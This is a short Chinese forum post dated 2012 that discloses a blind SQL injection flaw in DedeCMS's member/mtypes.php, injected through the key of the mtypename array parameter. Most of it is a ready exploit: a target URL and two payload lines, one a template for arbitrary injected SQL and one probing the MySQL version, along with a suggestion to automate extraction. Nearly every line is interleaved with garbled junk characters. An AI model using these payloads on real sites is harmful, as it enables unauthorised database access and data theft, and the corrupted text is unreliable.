需要magic_quotes_gpc = Off,所以说是鸡肋啊.
0 D0 j: ?. K& _$ `* A( ?6 D' H X2 r) e6 Z) N
* Q1 d/ S2 d" E3 q$ u- o: z发生在数组key里的注射漏洞,有点意思.
4 ~. A/ x# T6 W' P & x: @+ h& }/ E" c$ L3 o' D
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
: r: g5 R3 r" k' E" B( n, P
8 m/ M1 k/ y. [; Ehttp://www.xxx.com /dede/member/mtypes.php?dopost=save
( [1 {9 D* M- U" N8 b8 m N% n
$ ?, G! [% e* o( Y) `% @8 _6 ]exploit:
* A/ o2 _0 R% F* X: Omtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
3 ^# d2 h8 c! Q# E1 jmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
" ?$ `/ Y: p9 x# O2 e# [ |
发表于 2012-12-20 08:08:09
收藏
支持
反对